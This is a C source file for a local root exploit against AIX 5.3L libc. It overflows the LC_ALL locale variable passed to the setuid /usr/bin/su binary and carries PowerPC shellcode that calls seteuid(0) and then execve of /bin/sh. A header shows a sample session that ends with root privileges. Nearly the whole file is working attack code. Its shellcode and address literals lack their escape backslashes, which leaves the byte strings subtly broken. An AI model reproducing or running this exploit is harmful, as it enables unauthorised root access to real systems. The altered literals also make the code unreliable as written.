/*AIX 5.3L libc locale environment handling local root exploit
 * ============================================================
* The AIX5.3L (and possibly others) libc is vulnerable to multiple
* buffer overflow issues in the handling of locale environment
* variables. This allows for exploitation of any setuid root binary
* that makes use of functions such as setlocale() which do not
* perform bounds checking when handling LC_* environment variables.
* An attacker can leverage this issue to obtain root privileges on
* an impacted AIX system. This exploit makes use of the "/usr/bin/su"
* binary to trigger the overflow through LC_ALL and obtain root.
*
 * e.g.
* bash-4.4$ oslevel;uname -a;ls -al `which su`
* 5.3.0.0
* AIX aix53l 3 5 000772244C00
* -r-sr-xr-x 1 root security 28598 May 06 2006 /usr/bin/su
* bash-4.4$ gcc aix53l-libc.c -o aix53l-libc
* bash-4.4$ ./aix53l-libc
* [ AIX5.3L libc locale environment handling local root exploit
* # id
* uid=202(user) gid=1(staff) euid=0(root)
*
* -- Hacker Fantastic
* (https://hacker.house)
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <memory.h>
#include <string.h>

/* Payload string appended to the LC_ALL environment entry built in main().
 * The per-line annotations are the author's description of each 4-byte
 * group; the trailing "/bin/sh" literal is referenced by the payload itself.
 * Being a char array, the string is NUL-terminated, which is what lets
 * main() append it with strcat(). */
char shellcode[]="x7fxffxfbx78" /* mr r31,r31 (nop) */
"x7fxffxfbx78" /* mr r31,r31 (nop) */
"x7fxffxfbx78" /* mr r31,r31 (nop) */
"x7fxffxfbx78" /* mr r31,r31 (nop) */
"x7fxffxfbx78" /* mr r31,r31 (nop) */
"x7cx84x22x78" /* xor r4,r4,r4 */
"x7ex94xa2x79" /* xor. r20,r20,r20 */
"x40x82xffxfd" /* bnel (seteuidcode) */
"x7exa8x02xa6" /* mflr r21 */
"x3axb5x01x40" /* cal r21,0x140(r21) */
"x88x55xfexe0" /* lbz r2,-288(r21) */
"x7ex83xa3x78" /* mr r3,r20 */
"x3axd5xfexe4" /* cal r22,-284(r21) */
"x7exc8x03xa6" /* mtlr r22 */
"x4cxc6x33x42" /* crorc cr6,cr6,cr6 */
"x44xffxffx02" /* svca */
"xaax06xffxff" /* 0xab = seteuid 0x06 = execve */
"x38x75xffx04" /* cal r3,-252(r21) */
"x38x95xffx0c" /* cal r4,-244(r21) */
"x7ex85xa3x78" /* mr r5,r20 */
"x90x75xffx0c" /* st r3,-244(r21) */
"x92x95xffx10" /* st r20,-240(r21) */
"x88x55xfexe1" /* lbz r2,-287(r21) */
"x9ax95xffx0b" /* stb r20,-245(r21) */
"x4bxffxffxd8" /* bl (setreuidcode+32) */
"/bin/sh";

/* Entry point. Builds a single LC_ALL environment entry (filler, an
 * address, then the payload string) and replaces the process with
 * /usr/bin/su so that su's libc parses that entry; see the header
 * comment for the underlying issue. argc/argv are unused. */
int main(int argc, char* argv[]){
int i = 0;
int bufsize = 2048;
/* Heap buffer that becomes the only environment entry passed to execve(). */
char* buffer = malloc(bufsize);
if(!buffer)
exit(0);
/* Environment handed to su: just the LC_ALL entry, NULL-terminated. */
char* envp[] = {buffer,NULL};
/* su is invoked with "/" as its sole argument. */
char* argvp[] = {"su","/",NULL};
printf("[ AIX5.3L libc locale environment handling local root exploit ");
/* Only the first 1024 of the 2048 allocated bytes are cleared; every
 * later write goes through strcpy()/strcat(), which NUL-terminate, so
 * the uncleared tail is never read. */
memset(buffer,0,1024);
strcpy(buffer,"LC_ALL=");
/* 334 filler bytes precede the address below. */
for(i = 0;i < 334;i++){
strcat(buffer,"A");
}
strcat(buffer,"x2fxf2x2fx04"); // 0x2ff22f04
strcat(buffer,"AA");
/* Total length (prefix + filler + address + payload) stays well under
 * the 2048-byte allocation. */
strcat(buffer,shellcode);
/* execve() only returns on failure; that return value is not checked,
 * so a failed exec falls off the end of main() (implicit return 0 in C99). */
execve("/usr/bin/su",argvp,envp);
}